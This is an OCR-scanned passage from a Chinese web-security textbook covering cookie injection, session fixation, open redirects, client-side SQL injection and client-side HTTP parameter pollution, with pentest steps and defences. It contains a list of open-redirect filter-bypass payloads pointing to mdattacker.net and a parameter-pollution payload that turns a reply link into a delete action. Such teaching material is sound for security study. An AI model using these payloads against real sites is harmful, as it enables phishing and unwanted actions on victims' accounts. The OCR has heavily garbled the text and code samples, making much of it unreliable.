如 有 果 攻 击 者 可 以 设置 任意 cookie， 他 就 可 以 利用 该 cookie 以 各 种 方式 攻击 目标 用 户 : 

口 在 某 些 应 用 程序 中 , 设置 一 个 特殊 的 cookie 可 能 会 破坏 应 用 程序 的 逻辑 ,给 用 户 造 成 不 利 
影响 (例如 ，UseHttps=false )。 

口 由 于 cookie 通 常 仅 由 应 用 程序 本 身 设置 , 因此 它们 会 受 客 户 端 代 码 信任 。 该 代码 可 能 会 以 
各 种 危险 的 方式 ( 对 攻击 者 可 控制 的 数据 而 言 ) 处 理 cookie 值 ， 导 致 基于 DOM 的 XSS 或 
JavaScript 注 入 。 

口 除 将 反 CSREF 令 牌 与 用 户 会 话 关联 外 , 一 些 应 用 程序 还 在 cookie 和 请 求 参数 中 放置 该 令 牌 ， 
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然后 对 它们 的 值 进行 比较 ， 以 防止 CSRF 攻 击 。 如 果 攻 击 者 可 以 控制 cookie 和 参数 值 ， 就 
能 够 避 开 这 种 防御 。 

口 如 本 草 前 面部 分 所 述 ， 攻 击 者 可 以 利用 某 个 永久 性 XSS 漏 洞 ， 通 过 针对 登录 功能 的 CSRE 
攻击 使 用 户 登 录 攻 击 者 的 账户 ， 并 因此 访问 XSS 有 效 载 向 。 如 果 登 录 页 面 能 够 有 效 防 范 
CSRF， 这 种 攻击 将 无 法 霍 殖 。 但 是 ， 如 果 攻 击 者 能 够 在 用 户 的 训 览 需 中 设置 任意 cookie， 
他 就 可 以 耳 拉 向 用 户 传 送 自 己 的 会 话 令 牌 ， 从 而 成 功 实施 攻击 ， 而 不 必 实 施 针对 登录 功 

能 的 CSRF 攻 击 。 

口 cookie 可 以 对 会 话 固定 漏洞 加 以 利用 〈 将 在 下 一 节 介 绍 )。 

会 话 固定 

如 果 应 用 程序 在 用 户 首 次 访问 它 时 为 每 一 名 用 户 建立 一 个 匿名 会 话 , 这 时 往往 就 会 出 现 会 话 

国定 漏洞 。 如 果 应 用 程序 包含 登录 功能 ， 这 个 匿名 会 话 将 在 用 户 登 录 前 创建 ， 然 后 ， 一 旦 用 户 登 
录 ， 该 会 话 即 升级 为 通过 验证 的 会 话 。 最 初 ， 会 话 令 牌 并 来 被 赋予 任何 访问 权限 ,但 当 用 户 通过 
验证 后 ， 这 个 令 牌 也 具有 了 该 用 户 的 访问 权限 。 

在 标准 的 会 话 支持 攻击 中 , 攻击 者 必须 使 用 某 种 方法 规 获 一 名 应 用 程序 用 户 的 会 话 令 牌 。 另 

一 方面 ,在 会 话 固定 攻击 中 ,攻击 者 首先 从 应 用 程序 中 直接 获得 一 个 匿名 令 牌 ,然后 使 用 某 种 方 
法 将 这 个 令 牌 “固定 ”在 受害 者 的 浏览 器 中 。 用 户 登 录 后 ,攻击 者 就 可 以 使 用 该 令 牌 动 持 这 名 用 
户 的 会 话 。 

成 功 实施 这 种 攻击 所 需 的 步骤 如 网 13-4 所 示 。 
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入 (2) 攻击 者 将 会 话 令 牌 传送 给 用 户 
本 

L 

用 户 


图 13-4 ”实施 会 话 固 定 攻 击 所 需 的 步骤 


当然 ,在 这 个 攻击 中 ,最 关键 的 阶段 应 该 是 攻击 者 回 受害 者 传送 他 获得 的 会 话 令 有 牌 ， 并 令 受 
害 者 的 浏览 夯 使 用 这 个 令 牌 。 实 现 这 一 目标 的 方法 因 传送 会 话 令 牌 所 采用 的 机 制 而 异 。 
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口 如 果 使 用 HTTP cookie， 攻 击 者 可 以 尝试 使 用 上 一 市 介绍 的 某 种 cookie 注 入 技巧 。 
D 如 果 在 URL 参 数 中 传送 会 话 令 牌 , 则 攻击 者 只 需 向 受害 者 传递 应 用 程序 向 其 发 布 的 同一 
URL.: 

















https://wahh-app.com/login.php?SessId=12dlalf856ef224ab424c2454208 
口 一 些 应 用 程序 服务 融 接 受 在 URL 中 使 用 它们 以 分 号 分 隔 的 会 话 令 牌 。 一 些 应 用 程序 默认 
这 样 做 ， 而 其 他 应 用 程序 则 直接 以 这 种 方式 使 用 令 牌 ， 即 使 这 并 非 服 务 硕 的 默认 行为 : 


http://wahh-app.com/store/product.do;jsessionid=739105723F7AREE6ABC2 
13F81]12C184204 .ASTPESD2 


口 如 果 应 用 程序 使 用 HTML 表 单 中 的 隐藏 字段 来 传送 会 话 令 牌 攻击 者 可 以 利用 CSRF 攻 击 
在 用 户 的 浏览 帮 中 插入 他 的 令 牌 。 
并 不 提供 登录 机 制 的 应 用 程序 中 也 可 能 存在 会 话 固定 漏洞 。 例 如 ， ee 人 允许 匿名 
用 户 浏 览 产品 目录 、 在 购物 篮 中 添加 商品 、 通 过 提交 个 人 数据 与 支付 细节 进行 结算 ， 然 后 在 “ 确 
认 订 单 ” 页 面 上 审核 这 些 信 息 。 在 这 种 情况 下 ,攻击 者 就 可 以 将 一 个 匿名 会 话 令 牌 固定 到 受害 者 
的 浏览 硕 中 ， 等 外 地 该 用 户 提交 订单 并 输入 敏感 信息 ， 然 后 使 用 该 令 牌 访问 “确认 订单 ”页 面 ， 截 
获 该 用 户 的 信息 o 
一 些 Web 应 用 程序 与 Web 服 务 需 接受 用 户 提 交 的 任意 令 牌 ， 即 使 这 些 令 牌 并 不 是 由 服务 吉 在 
此 前 发 布 的 。 如 采 收 到 一 个 不 被 认可 的 令 牌 ， 服 务 需 会 直接 为 这 个 令 牌 建立 一 个 新 会 话 , 并 把 它 
当做 服务 顺和 生成 的 新 令 牌 处 理 。 过 去 ，Microsoft IIS 与 Allaire ColdFusion 服 务 需 都 存在 这 种 缺陷 。 
如 末 一 个 应 用 程序 或 服务 天 以 这 种 方式 运作 , 它 就 非常 容易 受到 会 话 固定 攻击 ,因为 攻击 者 
ww 目标 用 户 的 浏览 硕 中 的 令 牌 当前 有 效 。 攻 击 者 只 需 选 择 任意 一 
令 牌 ,将 其 尽 可 能 广 地 进行 分 发 (例如 ， 通 过 电子 邮件 辐 个 体 用 户 、 邮 件 列表 等 发 送 一 个 包含 
2 然后 定期 访问 应 用 程序 中 的 某 个 受 保 护 页 面 ( 如 “用 户 资料 ”)， 检 查 受 害 者 何 
时 使 用 这 个 令 牌 登录 。 即 使 目标 用 户 几 个 月 都 没有 访问 这 个 URL, 但 蓄意 破坏 的 攻击 者 仍然 有 可 
能 劫持 该 用 户 的 会 话 。 
elUUUOUUO0O0DOO 
如 采 应 用 程序 文 持 身份 验证 , 则 应 该 检查 它 如 何 处 理 与 登录 有 关 的 会 话 令 牌 。 在 下 面 两 种 情 
况 下 ， 应 用 程序 可 能 易于 受到 攻击 。 
口 应 用 程序 问 每 名 未 通过 验证 的 用 户 发 布 一 个 匿名 会 话 令 有 牌 。 在 用 户 登 录 后 ， 它 并 不 发 布 
新 令 牌 ， 相 反 ， 他 们 现 有 的 会 话 被 升级 为 通过 验证 的 会 话 。 使 用 应 用 程序 服务 需 的 默认 
会 话 处 理 机 制 的 应 用 程序 常常 采用 这 种 行为 。 
口 应 用 程序 并 不 癌 匿 名 用 户 发 布 令 牌 ， 只 有 用 户 成 功 登 录 后 ， 应 用 程序 才 癌 该 用 户 发 布 令 
牌 。 但 是 ， 如 果 用 户 使 用 通过 验证 的 令 牌 访问 登录 功能 ， 并 使 用 不 同 的 证 书 登 录 ， 则 应 
用 程 序 并 不 发 布 新 令 牌 相反 ， 与 之 前 通过 验证 的 会 话 关 联 的 用 户 吴 份 将 转换 为 第 二 
用 户 的 身份 
在 这 两 种 情况 下 ， 攻 击 者 都 能 获得 有 效 令 牌 〈 通 过 请 求 登 录 页 面 或 用 他 目 己 的 证 书 登 录 )， 
并 将 其 传送 给 目标 用 户 。 当 该 用 户 使 用 这 个 令 牌 登录 时 ， 攻 击 者 就 能 劫持 这 名 用 户 的 会 话 。 
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渗透 测试 步骤 
(1) 通过 任何 可 行 的 办 法 获得 一 个 有 效 令 牌 。 
(2) 访问 登录 表单 并 使 用 这 个 令 牌 登录 。 








(3) 如 条 登录 成 功 ， 而 且 应 用 程序 并 不 发 布 新 令 牌 ， 则 表示 它 易 于 受到 会 话 固定 攻击 。 














如 于 一 个 应 用 程序 并 不 文 持 验证 , 但 允许 用 户 提 交 并 审查 敏感 信息 , 那么 应 该 确认 用 户 在 提 
区 敏感 信息 前 后 是 否 使 用 相同 的 会 话 令 牌 。 如 采 令 牌 没有 发 生变 化 ， 则 攻击 者 就 可 以 获得 令 牌 ， 
并 将 其 传送 给 目标 用 户 。 用 户 提 交 敏 感 信 息 后 ， 攻 击 者 就 可 以 使 用 该 令 牌 查看 这 名 用 户 的 信息 。 























渗透 测试 步 双 
(1) 以 完全 匿名 的 用 户 身份 获得 一 个 会 话 令 牌 ,然后 完成 提交 人 敏感 数据 的 过 程 ， 接 下 来 继 
续 浏 览 ， 直 到 任何 显示 敏感 数据 的 页 面 。 
(2) 如 果 最 初 获得 的 同一 个 令 牌 现在 可 用 于 获取 敏感 数据 ， 应 用 程序 就 易于 受到 会 话 固定 








攻击 。 
G) 如 果 已 经 发 现任 何 会 话 固定 漏洞 ， 则 应 确定 应 用 程序 是 否 接受 它 之 前 并 未 发 布 的 任何 
令 牌 。 如 果 接受 ， 那么 在 很 长 一 段 时 间 内 攻击 者 都 可 以 非常 轻松 地 利用 这 个 漏洞 。 























e00000O0000O 

任何 时 候 ， 只 要 一 名 用 户 与 应 用 程序 的 交互 状态 由 匿名 转变 为 确认 , 应 用 程序 就 应 该 发 布 新 
的 会 话 令 牌 。 这 不 仅 适 用 于 用 户 成 功 登录 的 情况 ,而且 适 用 于 匿名 用 户 首次 提交 个 人 或 其 他 敏感 
信息 时 。 

为 进一步 防止 会 话 固定 攻击 , 一些 安全 性 至 关 重要 的 应 用 程序 采用 每 页 面 令 牌 来 强化 主 会 话 
令 牌 ， 以 提供 深层 防御 。 这 种 技巧 可 以 击 退 大 多 数 会 话 劫持 攻击 ， 请 参阅 第 7 章 了 解 详 情 。 

应 用 程序 不 得 接受 它 认 为 不 是 自己 发 布 的 任意 会 话 令 牌 。 应 立即 在 浏览 器 中 取消 该 令 牌 , 并 
将 用 户 返 回 到 应 用 程序 的 起 始 页 面 。 















































13.4.3 ”开放 元 重 定 癌 漏洞 


如 打 应 用 程序 提取 用 户 可 控制 的 输入 , 并 使 用 这 个 数据 执行 重 定 问 , 指示 用 户 的 浏览 带 访 问 
不 同 于 用 户 所 请 求 的 URL, 这 时 就 会 导致 开放 重 定 回 漏 洞 。 相 比 于 可 执行 大 量 恶意 操 作 的 路 站 操 
脚本 漏洞 ,攻击 者 通 笛 对 这 些 漏洞 不 太 感 兴趣 。 攻 击 者 主要 利用 开放 式 重 定 回 漏 洞 实施 钓鱼 攻击 ， 
谤 使 受害 者 访问 其 旨 性 Web 站 点 并 输入 敏感 信息 。 对 浴 在 的 受害 者 而 言 ， 重 定 加 漏洞 提高 了 攻击 
者 的 可 信和 度 ， 因 为 它 允 许 攻 击 者 创建 一 个 指向 他 所 针对 的 可 信 Web 站 点 的 URL， 因 此 更 具有 说 服 
力 , 但 任何 访问 这 个 URL 的 用 户 将 被 悄悄 重 定向 到 攻击 者 控制 的 Web 站 点 。 

也 就 是 说 , 现实 世界 中 的 大 多 数 钓鱼 攻击 部 使 用 其 他 技巧 来 获得 不 受 所 针对 的 应 用 程序 控制 
的 可 信和 度 。 这 类 技巧 包括 注册 类 似 的 域名 、 使 用 官方 形式 的 子 域 ,以 及 在 HTML 电 子 邮 件 中 在 害 
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位 文本 与 链接 的 目标 URL 之 间 造 成 不 匹配 。 人 研究 表明 ,多数 用 户 都 无 法 或 不 太 可 能 基于 URL 结 构 
作出 安全 决策 。 因 此 ， 典 型 的 开放 式 重 定向 漏洞 对 钓鱼 攻击 者 而 言 并 无 多 大 价值。 
近年 来 , 开放 式 重 定向 漏洞 一 直 被 攻击 者 以 相对 良性 的 方式 加 以 利用 , 用 于 实施 “ 瑞 克 播 摆 ” 
(rickrolling ) 攻击 。 在 这 种 攻击 中 ， 受 害 者 在 不 知情 的 情况 下 被 重 定向 到 英国 流行 乐 传奇 人 物 里 
殉 ， 阿 斯 特 利 的 视频 ， 如 图 13-5 所 示 。 3 
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图 13-5  “ 瑞 克 摇摆 ”攻击 的 结 


1. 查找 并 利用 开放 式 重 定向 漏洞 
查找 重 定 癌 漏洞 的 第 一 步 是 确定 应 用 程序 中 的 所 有 重 定 癌 。 应 用 程序 可 以 通过 儿 种 方式 使 用 
户 的 浏览 带 重 定 癌 到 不 同 的 URL。 
口 HTTP 重 定 癌 使 用 一 条 状态 码 为 3xx 的 消息 与 一 个 指定 重 定 问 目 标的 Location 消 奶头 。 
例如 : 
HTTP/1.1 302 Object moveqd 
Location: http://mdsec.net/updates/update29 .html 


口 HITPRefresh 消 息 头 可 在 固定 时 间 间 隔 后 使 用 任意 URL 重 新 加 载 某 个 页 面 , 该 间隔 可 以 
为 堆 (0 )， 也 就 是 能 立即 触发 重 定 向 。 例 如 : 


HTTP/1.1 200 OK 
Refresh: 0; url=http://mdsec.net/updates/update29.html 
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口 HTML <meta> 标 签 可 复制 任何 HTTP 消 息 尖 的 行为 ， 因 此 可 用 于 建立 重 定 问 。 例 如 : 


HTTP/1.1 200 OK 
Content-Length: 125 


<html> 

<head> 

<meta http-equiv="refresh’" content-= 
"Ourl=http://mdsec.net/updates/update29 .html "> 
</head> 

</html> 


口 JavaScript 中 的 各 种 API 可 用 于 将 浏览 硕 重 定 癌 到 任意 URL。 例 如 : 


HTTP/1.1 200 OK 
Content-Length: 120 


<html> 

<head> 

<Script> 

document .location="http://mdsec.net/updates/update29 .html".; 
</ScCript> 

</head> 

</html> 


以 上 这 些 方法 可 用 于 指定 绝对 或 相对 URL。 


渗透 秀 测试 步 








we 

(2) 要 确定 所 有 重 定 向 ,一 个 有 效 的 方法 ， 是 使 用 拦截 代理 服务 侣 浏览 应 用 程序 ， 并 监控 
访问 页 面 的 请 求 〈 与 其 他 资源 ， 如 图 像 、 样 式 表 、 脚 本 文件 等 不 同 )。 

(3) 如 有 果 一 个 导航 操作 导致 了 几 个 连续 请 求 ， 应 分 析 它 使 用 什么 方法 进行 重 定 回 。 

















绝 大 多 数 的 重 定 癌 都 不 受用 户 控 制 。 例 如 ， 在 典型 的 登录 机 制 中 ， 向 /login.jsp 提 交 有 效 的 证 
书 将 返回 一 个 指向 /myhome.jsp 的 HTTP 重 定 辣 。 这 时 ， 重 定 问 的 目标 始终 相同 ， 因 此 不 会 受到 任 
何 重 定 癌 疡 洞 的 影响 。 

但 是 , 在 有 些 情况 下 ,用户 提交 的 数据 以 菏 种 方式 用 于 设置 重 定 问 的 目标 。 一 个 第 见 的 例子 
是 , 应 用 程序 强制 使 会 话 已 经 终止 的 用 户 返 回 登 录 页 面 , 然后 在 用 户 重 新 成 功 通过 验证 后 将 他 们 
重 定 问 到 最 初 的 URL。 如 果 遇 到 这 种 行为 ， 就 表明 应 用 程序 可 能 多 于 受到 和 草 定 向 攻击 ， 因 此 ， 应 
当 对 这 种 行为 进行 深入 分 析 ， 以 确定 它 是 否 可 被 攻击 者 利用 。 












































渗透 秀 测试 步 





py 则 应 修改 URL 中 的 域名 ， 并 测试 
应 用 程序 是 否 将 用 户 重 定 回 到 邦 一 个 域 。 
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(2) 如 果 所 人 处理 的 用 户 数 据 包 含 相 对 URL， 应 将 此 URL 修 改 为 指 问 男 一 个 域 的 绝对 URL， 
并 测试 应 用 程序 是 否 将 用 户 重 定 问 到 这 个 域 。 
(3) 无 论 是 哪 一 种 情况 ， 如 果 见 到 以 下 行为 ,那么 应 用 程序 肯定 容易 受到 重 定 癌 攻击: 


GET /updates/8/?redir=http://mdattacker.net/ HTTP/1.1 
Host: mdsec.net 














HTTP/1.1 302 Object moved 
Location: http://mdattacker.net/ 


尝试 访问 
http://mdsec.net/updates/8/ 
http://mdsec.net/updates/14/ 
http://mdsec.net/updates/18/ 
http://mdsec.net/updates/23/ 
http://mdsec.net/updates/48/ 


注解 ”如 果 应 用 程序 使 用 可 由 用 户 控 制 的 数据 指定 框架 的 目标 URL， 这 时 会 发 生 一 种 
与 重 定向 并 非 完 全 相同 但 相似 现象 。 如 果 可 以 构建 一 个 URL， 将 外 部 URL 的 内 容 加 载 


到 子 框架 中 ， 就 可 以 相当 隐秘 地 实施 重 定 向 攻击 。 这 时 ， 可 以 使 用 其 他 内 容 仅 替换 应 
用 程序 的 部 分 界面 ， 并 使 浏览 器 地 址 栏 中 的 域 保 持 不 变 。 














以 下 情况 很 常见 : 用 户 控制 的 数据 用 于 设置 重 定 回 的 目标 , 但 却 被 应 用 程序 以 某 种 方式 过 滤 
或 净化 挥 ,以 阻止 重 定 问 攻 击 。 这 时 并 没有 办 法 确定 应 用 程序 是 否 多 于 受到 攻击 ; 因此 , 接 下 来 
应 该 探查 应 用 程序 采用 的 防御 机 制 , 确定 是 否 能 够 避 开 它们 以 执行 任意 重 定 癌 。 通 常会 过 到 以 下 
两 种 防御 : 尝试 阻止 绝对 URL、 附 加 一 个 特殊 的 绝对 URL 前 级 。 


® [LUU URL 

应 用 程序 可 能 会 检查 用 户 提 交 的 字符 串 是 否 以 http:/ 开 头 ， 如 果 是 ， 就 阻止 该 请 求 。 这 时 ， 
使 用 下 面 的 技巧 可 以 成 功 创建 一 个 指向 外 部 Web 站 点 的 重 定 向 (请 注意 第 三 行 开头 的 空格 ): 

HtTp://mdattacker.net 

S00hnttp://mdattacker.net 

http://mdattacker.net 

/:/mdattacker.net 

S68%E74%74%70%3a%S2fS2fmdattacker.net 

S25682574%S2574%2570%253a%252f%252fmdattacker.net 

https://mdattacker.net 

http:\\‘mdattacker.net 

http:///mdattacker.net 


另外 ， 应 用 程序 可 能 会 删除 http:/ 及 任何 指定 的 外 部 域 ， 答 试 净化 绝对 URL。 这 时 ， 使 用 上 
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面 的 技巧 可 以 成 功 避 开 净 化 ; 同时 还 应 测试 下 面 的 攻击 是 否 可 行 : 
http://http://mdattacker.net 
http://mAQattacker.net/http://mdattacker.net 
hthttp://tp://mdattacker.net 


有 时 , 应 用 程序 可 能 会 检验 用 户 提交 的 字符 串 是 否 以 指 回 它 目 己 的 域名 的 绝对 URL 开 头 , 或 
是 否 包含 这 个 URL。 这 时 ， 下 面 的 攻击 可 能 有 效 : 
http://mdsec.net.mdattacker.net 


http://mdattacker.net/?http://mdsec.net 
http://mdattacker.net/%23hnttp://mdsec.net 


尝试 访问 


http:/ mdsec.netupdates/32/ 
http:/ mdsec.netupdates/37/ 
http:/mdsec.netupdates/39/ 
http://mdsec.net/updates/66/ 
http://mdsec.net/updates/69/ 








se 
应 用 程序 可 能 会 在 用 户 提交 的 字符 串 前 附加 一 个 绝对 URL 前 级 ， 从 而 建立 重 定 向 的 目标 。 


GET /updates/72/?redir=/updates/update?29 .html HTTP/1.1 











Host: mdsec.net 


HTTP/1.1 302 Object moved 
Location: http://mdsec.net/updates/update239 .html 


这 时 ， 我 们 无 法 确定 应 用 程序 是 否 易于 受到 攻击 。 如 末 所 使 用 的 前 缀 由 http:// 与 应 用 程序 的 
域名 组 成 ， 但 在 域名 后 没有 冬 线 字符 ， 那 么 它 就 易于 受到 攻击 。 例 如 ， 下 面 的 URL 

http://mdsec.net/updates/72/?redir=.mdattacker.net 
会 重 定 问 到 

http://mdsec.net.mdattacker.net 
它 由 攻击 者 控制 ， 前 提 是 攻击 者 控制 者 域 mdattackernet 的 DNS 记录 。 

然而 ， 如 采 绝 对 UREL 前 绥 确 实 包含 料 线 字 符 〈/) 或 服务 硕 上 的 某 个 子 目 录 ， 那 么 应 用 程序 
可 能 不 会 受到 针对 外 部 域 的 重 定 向 攻击 。 这 时 , 攻击 者 最 多 只 能 构建 一 个 URL, 将 用 户 重 定 问 到 
同一 应 用 程序 中 的 为 一 个 URL。 通 闸 ,这 种 攻击 并 不 能 取得 任何 成 果 ， 因 为 如 末 攻 击 者 能 够 诱 使 
用 户 访 问 应 用 程序 中 的 一 个 URL， 那 么 他 大 概 也 只 能 向 他 们 下 接 传送 为 一 个 URL。 


尝试 访问 


http:/ mdsec.netupdates/72/ 


















































如 果 使 用 从 DOM 中 查询 数据 的 客户 端 JavaScript 实 现 重 定 向， 则 负责 执行 重 定 加 与 相关 确认 
的 所 有 代码 通常 将 在 客户 端 上 可 见 。 因 此 , 应 仔细 检查 这 些 代 码 ， 确 定 它 如 何 将 用 户 探 制 的 数据 
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合并 到 URL 中 ， 以 及 它 是 否 执行 了 任何 确认 ， 如 有 末 是 ,是否 有 什么 办 法 可 以 避 开 确认 。 注意 ， 和 
基于 DOM 的 XSS 源 洞 一 样 , 在 将 脚本 返回 浏 览 病 之 前 ,服务 从 可 能 对 其 执行 了 其 他 确认 。 下 面 的 
JavaScript API 可 用 于 执行 重 定 问 : 
UD document . Location 
UD document .URL 43 


UD document .open ( ) 





UD window.location.href 
UD window.navigate() 


UD window.open() 


http://mdsec.net/updates/76/ 
http://mdsec.net/updates/79/ 
http://mdsec.net/updates/82/ 
http://mdsec.net/updates/91/ 
http://mdsec.net/updates/92/ 
http://mdsec.net/updates/95/ 


2. 防止 开放 式 重 定向 漏洞 
绝 不 将 用 户 提交 的 数据 合并 到 重 定 回 目标 中 , 是 避免 开放 式 重 定 加 漏洞 的 最 有 效 方法 。 开 发 
者 这 样 做 出 于 各 种 原因 , 但 通 稍 我 们 都 可 以 找到 符 代 办 法 。 例 如 , 用 户 界 面 中 常 浓 包含 一 组 链接 ， 
每 个 链接 指向 一 个 重 定向 页 面 ， 并 以 目标 URL 为 参数 。 这 时 ， 可 能 的 替代 方法 如 下 。 
口 从 应 用 程序 中 删除 重 定 癌 页 面 ， 用 下 接 指 向 相关 目标 URL 的 链接 蔡 代 指 癌 重 定 问 页 面 的 
链接 。 
口 建立 一 个 包含 所 有 有 效 重 定 辣 URL 的 列表 。 不 以 参数 的 形式 癌 重 定 问 页 面 传送 目标 URL， 
而 是 传送 这 个 列表 的 沦 引 。 重 定 问 页 面 应 在 它 的 列表 中 查询 这 个 索引 ， 并 返回 一 个 指 问 
相关 URL 的 重 定向 。 
如 果 重 定 问 页 面 不 可 避免 地 要 收 到 用 户 提 交 的 输入 并 将 它 合并 到 重 定 癌 目标 中 , 应 使 用 以 下 
措施 降低 重 定 癌 攻击 的 风险 。 
口 应 用 程序 应 在 所 有 重 定 向 中 使 用 相对 URL， 重 定向 页 面 应 严格 确认 它 收 到 的 URL 为 相对 
URL。 它 应 当 确 保 : 用 户 提 交 的 URL 或 者 以 其 后 接 一 个 字母 的 斜 线 字 符 开 头 ， 或 者 以 一 
个 字母 开头 ， 并 且 在 第 一 个 和 斜 线 前 没有 冒号 。 应 拒绝 ， 而 不 是 净化 任何 其 他 输入 。 
口 应 用 程序 应 该 在 所 有 重 定 癌 中 使 用 相对 于 Web 根 目录 的 URL, 在 发 布 重 定 问 之 前 , 重 定 辣 
页 面 应 在 所 有 用 户 提 交 的 URL 表 附加 http://yourdomainname.com。 如 果 用 户 提 交 的 URL 并 
不 以 冬 线 字符 开头 ， 应 在 它 的 前 面 附加 http://yourdomainname.com/。 
口 应 用 程序 应 对 所 有 重 定 问 使 用 绝对 URL， 重 定 癌 页 面 在 发 布 重 定 问 之 前 ， 应 确认 用 户 提 
交 的 URLLhttp://yourdomainname.com/ 开 涉 。 此 外 ， 应 拒绝 任何 其 他 输入 。 
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和 基于 DOM 的 XSS 漏 洞 一 样 , 建议 应 用 程序 不 要 根据 DOM 数 据 通 过 客户 端 脚 本 执行 重 定 问 ， 
为 这 些 数 据 不 在 服务 个 的 直接 控制 荡 围 内 。 


13.4.4” 客 尸 端 SQL 注 入 


HTML5 支 持 客户 端 SQL 数 据 库 ， 应 用 程序 可 使 用 该 数据 库 在 客户 端 存储 数据 。 这 些 数据 库 
使 用 JavaScript 访 问 ， 如 以 下 示例 所 示 : 


var db = openDatabase('contactsdb', 1.0', 'WahhMail contacts', 1000000}).，: 
db.transaction(function (tx}) f 
tx.executeSagql ('CREATE TABLE IF NOT EXISTS contacts (id unique, name, 








emalill})}'}).: 
tx.executeSql{('INSERT INTO contacts (id, name, email) VALUES (1, "Matthew 
Adamson”", “madame@nucnt.com"})').: 


}); 

应 用 程序 可 以 使 用 此 功能 将 第 用 数据 存储 到 客户 病 , 然后 在 需要 时 将 这 些 数据 快速 检索 到 用 
户 界面 中 。 它 还 人 允许 应 用 程序 以 “离线 模式 ”运行 , 在 这 种 模式 下 ,所 有 由 应 用 程序 处 理 的 数据 
将 驻 留 在 客户 端 ， 用 户 操作 也 存储 在 客户 病 ， 以 便 在 网 络 连接 可 用 时 与 服务 硕 进 行 同步 。 

我 们 在 第 9 草 中 介绍 了 如 何在 服务 胡 病 SQL 数据 库 中 实施 SQL 注 和 人 攻击， 在 这 种 攻击 中 ， 攻 
击 者 将 受 其 控制 的 数据 以 危险 的 方式 插入 SQL 查询 中 。 实 际 上 ， 在 客户 端 也 可 能 发 生 此 类 攻击 。 
下 面 列 出 了 一 些 可 能 受到 这 种 攻击 的 应 用 程序 。 

口 社交 网 络 应 用 程序 ， 这 类 应 用 程序 将 用 户 的 联系 人 信息 存储 在 本 地 数据 库 中 ， 包 括 联 系 

人 姓名 和 状态 更 新 。 
口 新 闻 应 用 程序 ， 这 类 应 用 程序 将 文章 和 用 户 评论 存储 在 本 地 数据 库 中 ， 以 便于 离线 查看 。 
口 Web 邮 件 应 用 程序 ,这 类 应 用 程序 将 电子 邮件 存储 在 本 地 数据 库 中 ,在 离线 模式 下 运行 时 ， 
则 存储 竺 发 邮件 以 便于 稍 后 发 送 。 

在 这 些 情况 下 , 攻击 者 可 以 将 专门 设计 的 输入 包含 在 受 其 控制 的 一 组 数据 中 ( 应 用 程序 在 本 
地 存储 这 些 数据 )， 从 而 实施 客户 端 SQL 注 入 攻击 。 例 如 ， 通 过 发 送 一 封 电 子 邮 件 ， 并 在 主题 行 
中 包含 SQL 注 入 攻击 代码 ( 如 有 果 这 些 数据 般 入 在 客户 端 SQL 查 询 中 )， 就 可 以 攻破 收 件 人 用 户 的 
本 地 数据 库 。 如果 应 用 程序 以 危险 的 方式 使 用 本 地 数据 库 , 就 可 能 导致 严重 的 攻击 ,仅仅 使 用 SQL 
注入 , 攻击 者 就 可 以 从 数据 库 中 检索 用 户 已 收 到 的 其 他 邮件 的 内 容 , 将 这 些 数据 复制 到 发 送 给 攻 
击 者 的 得 发 电子 邮件 ， 然 后 将 该 电子 邮件 添加 到 已 排队 的 每 发 邮件 表 中 。 

通常 存 储 在 本 地 数据 库 中 的 数据 类 型 可 能 为 SQL 元 字符， 如 单 引 写 。 因 此, 在 正常 使 用 测试 
期 间 即 可 确定 许多 SQL 注入 漏洞 , 从 而 实施 针对 SQL 注入 攻击 的 防御 机 制 。 和 服务 融 端 注入 一 样 ， 
这 些 防 御 机 制 也 可 以 通过 各 种 方法 规避 ， 从 而 实施 成 功 的 攻击 。 

























































































13.4.5 客户 端 HTTP 参 数 污染 


在 第 9 章 中 , 我 们 介绍 了 如 何在 某 些 情况 下 使 用 HTTP 参 数 污染 攻击 来 破坏 服务 从 端 应 用 程序 
逻辑 。 有 时 ， 这 些 攻 击 也 可 以 在 客户 端 实施 。 
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以 一 个 使 用 以 下 URL 加 载 收 件 箱 的 Web 邮 件 应 用 程序 为 例 : 
https://wahh-mail.com/show?folder=inbox&korder=down&size=20&start=1 
在 收 件 箱 中 ， 每 封 邮件 劳 显 示 了 几 个 链接 ， 可 用 于 执行 删除 、 转 发 和 回复 等 操作 。 例 如 ， 回 复 第 
12 封 邮件 的 链接 如 下 : 


<a href="doaction?folder=inbox&korder=down&size=20&start=l&message=12&action= 
reply&krnd=1935612936174">reply</a> 


这 些 链 接 中 的 一 些 参数 将 被 复制 到 收 件 箱 URL 中 。 即 使 应 用 程序 能 够 有 效 防 范 XSS 攻 击 , 但 
攻击 者 仍然 可 以 构建 一 个 URL, 使 用 在 这 些 链 接 中 回 显 的 其 他 值 来 显示 收 件 箱 。 例如， 攻击 者 可 
以 提供 以 下 人 参数: 

start=1%26action=-delete 
此 参数 包含 一 个 URL 编 码 的 gs 字符 ， 应 用 程序 服务 部 将 自动 对 该 字符 进行 解码 。 传 递 给 应 用 程序 
的 start 人 参数 的 值 为 : 

l&action=delete 

如 有 果 应 用 程序 接受 这 个 无 效 值 并 仍然 显示 收 件 箱 , 同时 不 加 修改 地 回 显 该 值 , 用 于 回复 第 12 
封 邮 件 的 链接 将 变 为 : 


<a href="doaction?folder=inbox&order=down&size=20&start=1l&action=deleteg& 





























message=1l2&action=reply&rnd=1935612936174">reply</a> 

现在 ， 此 链接 包含 两 个 操作 参数 一 一 一 个 指定 delete, 一 个 指定 reply。 和 标准 的 HTTP 参 
数 污染 一 样 ， 在 用 户 单 击 “回复 ”链接 时 ， 应 用 程序 的 行为 取决 于 它 如 何 处 理 重复 的 参数 。 许 多 
时 候 ， 应 用 程序 使 用 第 一 个 值 ， 因 此 ， 用 户 将 在 不 知情 的 情况 下 删除 任何 其 尝试 回复 的 邮件 。 

请 注意 , 在 本 示例 中 , 用 于 执行 操作 的 链接 包含 一 个 rngd 参 数 , 它 实 际 上 是 一 个 反 CSRF 令 牌 ， 
以 防止 攻击 者 通过 标准 的 CSRF 攻 击 轻 松 诱发 这 些 操 作 。 由 于 客户 问 HPP 攻 击 会 注入 由 应 用 程序 
构建 的 现 有 链接 ， 因 此 该 反 CSRF 令 有 牌 将 以 正 第 方式 进行 处 理 ， 因 而 无 法 阻止 攻击 。 

在 现实 世界 的 大 多 数 Web 邮 件 应 用 程序 中 ,很 可 能 存在 更 多 可 供 利用 的 操作 ,包括 删除 所 有 
邮件 、 转 发 单个 邮件 ， 以 及 创建 通用 的 邮件 转发 规则 。 根 据 这 些 操 作 的 实施 方式 ,攻击 者 就 可 以 
